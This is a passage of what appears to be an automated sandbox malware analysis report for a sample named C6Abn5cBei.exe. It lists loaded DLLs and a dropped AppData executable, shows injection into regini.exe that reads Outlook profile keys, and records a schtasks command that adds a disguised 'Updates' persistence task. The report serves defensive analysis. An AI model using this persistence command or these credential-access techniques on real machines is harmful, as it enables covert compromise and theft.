                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: C6Abn5cBei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: C6Abn5cBei.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C6Abn5cBei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: vpxg.pdb source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mDeEygzSIDmBTP.exe, 00000010.00000000.1799904534.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000002.2687661742.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: C6Abn5cBei.exe, C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: vpxg.pdbSHA256 source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
                Source: Binary string: regini.pdb source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp
                Source: C6Abn5cBei.exeStatic PE information: 0xEE97DEC3 [Mon Nov 5 05:06:11 2096 UTC]
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0041A84A push cs; ret 9_2_0041A84F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00411964 push ds; retf 9_2_00411966
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00414A73 push eax; retf 9_2_00414A74
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00414355 pushfd ; iretd 9_2_00414356
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004033C0 push eax; ret 9_2_004033C2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00417475 push ds; retf 9_2_00417478
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040B4B9 push ss; ret 9_2_0040B4BC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00416635 push es; retf 9_2_00416674
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004166AE push es; retf 9_2_00416674
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011809AD push ecx; mov dword ptr [esp], ecx9_2_011809B6
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB8548 push eax; iretd 10_2_05DB8549
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB7EF3 pushfd ; retf 10_2_05DB7EF9
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB7E5B push esp; retf 10_2_05DB7E61
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB7E58 pushad ; retf 10_2_05DB7E59
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145C54D pushfd ; ret 15_2_0145C54E
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145C54F push 8B013E67h; ret 15_2_0145C554
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145C9D7 push edi; ret 15_2_0145C9D9
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014109AD push ecx; mov dword ptr [esp], ecx15_2_014109B6
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_013E135E push eax; iretd 15_2_013E1369
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_013E1FEC push eax; iretd 15_2_013E1FED
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01467E99 push ecx; ret 15_2_01467EAC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330CB6B push ds; retf 16_2_0330CB6D
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03315A51 push cs; ret 16_2_03315A56
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03310902 push ebx; ret 16_2_03310903
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03311837 push es; retf 16_2_0331187B
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033118B5 push es; retf 16_2_0331187B
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03311093 push ecx; retf 16_2_03311094
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033107E7 push eax; ret 16_2_03310829
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0331267C push ds; retf 16_2_0331267F
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033066C0 push ss; ret 16_2_033066C3
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330FC7A push eax; retf 16_2_0330FC7B
                Source: C6Abn5cBei.exeStatic PE information: section name: .text entropy: 7.779278383035423
                Source: zdDlscHlw.exe.0.drStatic PE information: section name: .text entropy: 7.779278383035423
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile created: C:\Users\user\AppData\Roaming\zdDlscHlw.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
